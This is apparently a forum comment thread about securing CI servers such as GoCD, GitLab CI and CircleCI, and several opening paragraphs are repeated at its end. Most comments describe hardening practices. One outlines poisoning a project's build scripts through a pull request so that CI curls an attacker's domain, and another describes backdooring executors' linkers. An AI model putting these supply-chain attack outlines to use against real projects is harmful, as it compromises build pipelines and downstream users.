I have used Jenkins, TeamCity, Bamboo, and GoCD. As with any tool, misconfiguration and lack of ops involvement is going to lead to clueless implementations. One might as well say "I granted everyone admin access, and they are able to run any command now".
For all these tools, there is documentation on how to lock down access to the server, and also how to run the agents under various users accounts. On my current engagement, for e.g., I ensure that the various GoCD agents run as low privileged users, with access granted via sudo.
Further, running commands directly is easy. But a better pattern is to push these commands into a script, to check in the script into version control, and to then check out and run that script. At least GoCD is opinionated that way by enforcing that users use "materials" (which could be a checkout from a revision control system).
GoCD enforces something called a "sandbox", where the file references are restricted to only the working directory for that particular job. If one needs to access files outside of this sandbox, then one needs to explicitly invoke a shell - after which point the admin/script owner is responsible for what happens. This is because the GoCD admin/script owner permitted either a command interpreter to be invoked directly, or the script owner did so within their script.
I now-a-days deliver scripts as Ansible playbooks using GPG signed RPMs, the execute the Ansible playbooks in local mode.
The non-salted SHA1 passwords is a good report. GoCD lets uses specify either an htpasswd generated file, or an LDAP source. On enterprise implementations, I always link GoCD to an LDAPs source and manage the credentials there.
In short, if one doesn't read the documentation and just implements distributed orchestrators with zero ops sensibilities, then such WTFs of being able to execute any command would of course be possible.
This horrifically written document alleges that CI tools are risky because if they fall they grant a vector to other parts of infrastructure. That's also true for just about any machine... even a developer laptop.
Good CI/CD processes increase not only security (less crufty servers lying around) but also recovery procedures because they force you to be able to deploy... to new, external, backup or refreshed infrastructure, if necessary.
This talk is written in a Black Hat idiom: take trendy technology, perform basic risk assessment, find one or more exploitable software security mistakes, generate "catchy" title.
It's unlikely that the author really believes CI tools are so risky that you should avoid them. On the other hand, it's good to know that your CI infrastructure is part of your attack surface; chances are, the author came up with the idea for this talk after exploiting a CI system on a real pentest (I know that happened at Matasano a couple times).
This is why you keep your CI networks in a private VLAN with proxy servers back to the public Internet. You don't just stick your CI servers on your corporate network -- you park them behind a jump server and proxy back anything you need to.
For every project I've set up CI for, it doesn't matter if someone hacks my CI servers because they don't have access to anything other than dummy data. Sure; you could hack prod systems by building a trojan version of one of the binaries. But even then the binaries just get uploaded to a repository; so with proper code profiling and security testing you would notice the rogue binary before it ever hits a prod server.
It is important to keep CI as a dev process -- deployment should be handled by an orchestration system as it's much more of a tech ops process than a dev process. This is where config management and the like become very important; and those should be left to people who think like operations and security managers rather than hackers who just want to make shit work quickly (there's a place for both inside any good dev org).
Another good reason to keep CI locked out from other networks is to make sure all asset references are properly rewritten. Of summertime hard codes an open internet source or, even worse, an internal source, that will generate a 404 when testing, and any unexpected 404s in the log are instant test fails.
Owning someone's CI system via the CI system is all well and good, but not surprising in the slightest. All these things expose web-based admin interfaces, so of course they're vulnerable at the very least to social engineering.
The real trick is owning someone's CI system via the code under test. And it's even more versatile because it works even for projects which keep their executor scripts checked in to source.
1) Check out and gain an understanding of the target's CI scripts
2) Create a pull request (or whatever) which makes some reasonable code change but also introduces a vulnerability into the build/test scripts themselves. For example, curl'ing a domain you control.
3) Kick off pre-commit runs of all the tests to see if your patch should be accepted.
Even when you have control of a project tested by the CI server you should not have control of the CI server itself.
GitLab comes with integrated CI. But all the tests are ran by GitLab Runner on external machines. You can spin up (and down) a new machines per test with Runner Autoscale if you want.
As far as I could see GitLab CI is not vulnerable to the items mentioned in the article (apart from only enforcing password length, not complexity).
Yes, sandboxing and ephemeral machines are far and away the best defense a CI system has against compiling/testing malicious code. But the vast majority of CI systems don't actually use ephemeral executors because imaging between runs is slow and rebuilding your whole checkout/object cache is expensive.
You don't need to own the CI server in order to own a project. You can take over all of the individual executors and replace their linker with your own version that links against an attacker-supplied backdoored fork of openssl (for an extreme and topical example). Doesn't even require constantly-running code which might be detected by a monitoring system, and naturally persists across reboots (but not reimagings).
I'm glad that GitLab is paying attention to these things. The Travis which is tightly integrated with GitHub also seems to do a good job, although I haven't looked into it extensively. But plenty of orgs run self-hosted CI that simply isn't up to proper security standards in this respect.
Heavy Gitlab CI user here. The real problem is isolating the runners themselves. You can assign runners to individual projects for isolation, but when the runners can't be AWSed (iOS hardware, for example) you have to make tough choices about buying more stuff to sit under your desk right next to the stuff you could be using that's idle.
IMO some basic isolation measures like clearing the cache between projects would be good. Killing active processes when a job ends.
Thanks for using GitLab heavily! When running GitLab Runner on metal you can already opt to start with a fresh clone instead of updating I think. I'm not sure about killing active processes, feel free to create an issue to discuss further.
Every place I've worked, devs have complete access to dev resources like databases, CI servers, web servers and usually have access to QA resources and it's only by convention that we don't screw with it without asking for permission.
Why would just anyone have access to production resources - which would be required to take advantage of any of the things he stated.
Also, dev/QA should be on a separate domain anyway.
I'm kind of shocked all y'all commentators have such well secured CI systems. ;)
I've been developing software for 17 years, and at every employer, from 2 to 20,000 employees, CI systems were treated as an afterthought in terms of infrastructure and security resources.
It was dramatically obvious how bad this was from a security perspective, so perhaps this article isn't necessary, but certainly it's right on the money.
We have a CI tool that I've been trying to secure for a long time. Usually when I add something (SSL so people can't sniff passwords / hijack sessions) the response I get from some others is "why bother? If something bad happens the person who does it will be fired!"
It baffles me really. Most of the time I do it anyway. But we still have a few major holes I've been slowly patching. There's one last glaring problem: permissions are controlled by teams in an external tool. Anyone has auth to change teams in said tool.
I'm surprised the article focused on compromising the build farm instead of danger to the production. I guess a malicious agent could alter the behavior of the build that makes it to production and attempt to slide in an extra "feature" like weakened security or back door.
Nevertheless, it's a good reminder to consider build servers as part of the attack surface.
We use CircleCI, and since all our environments are on a VPN we opted for a pull based solution instead of CircleCI notifying/pushing anything to our servers.
The way it works, Circle pushes the containers built to Google Container Registry and there is a super simple tool I built (https://github.com/crufter/puller) pulls those images. This introduces a couple of minutes of delay but we find that acceptable.
I guess we are still exposed to the possibility of someone breaking into Circle, using the keys there to push to our GCR repos, but at least they won't have full access to our servers...
Having code running in a container is still harder to exploit than just having full ssh access to the boxes?
I am not a security expert by any means, and this workflow was not created with security as a priority in any means, but the latter still rubs me in a worse way. It might be just an ignorant hunch though.
That's something really interesting, and it comes handy for a side project I have, but I don't think it fixes the problem with people hijacking the docker repo - they will just change the Dockerfile itself, right?
Yes I agree. There are some things you can do for example you can have client certificates, only trusted clients can talk to your ci, and onlt trusted clients can push images. Only dev with ssh keys can push code.
Your ci and registry are locked down (a container).
My CI server is inside an amazon VPC, accessible via an ssh tunnel. Only certain people can access the production VPC and everyone's keys have a strong passphrase ... why trust your CI tool's security when you can rely on much more robust things like SSH?
Since a build server in its most generic form is just a thing to run commands, this isn't very surprising. I hoped for more details on how to secure the deployment part because that's less trivial (access to prod machines and prod service credentials)
For all these tools, there is documentation on how to lock down access to the server, and also how to run the agents under various users accounts. On my current engagement, for e.g., I ensure that the various GoCD agents run as low privileged users, with access granted via sudo.
Further, running commands directly is easy. But a better pattern is to push these commands into a script, to check in the script into version control, and to then check out and run that script. At least GoCD is opinionated that way by enforcing that users use "materials" (which could be a checkout from a revision control system).
GoCD enforces something called a "sandbox", where the file references are restricted to only the working directory for that particular job. If one needs to access files outside of this sandbox, then one needs to explicitly invoke a shell - after which point the admin/script owner is responsible for what happens. This is because the GoCD admin/script owner permitted either a command interpreter to be invoked directly, or the script owner did so within their script.
I now-a-days deliver scripts as Ansible playbooks using GPG signed RPMs, the execute the Ansible playbooks in local mode.
The non-salted SHA1 passwords is a good report. GoCD lets uses specify either an htpasswd generated file, or an LDAP source. On enterprise implementations, I always link GoCD to an LDAPs source and manage the credentials there.
In short, if one doesn't read the documentation and just implements distributed orchestrators with zero ops sensibilities, then such WTFs of being able to execute any command would of course be possible.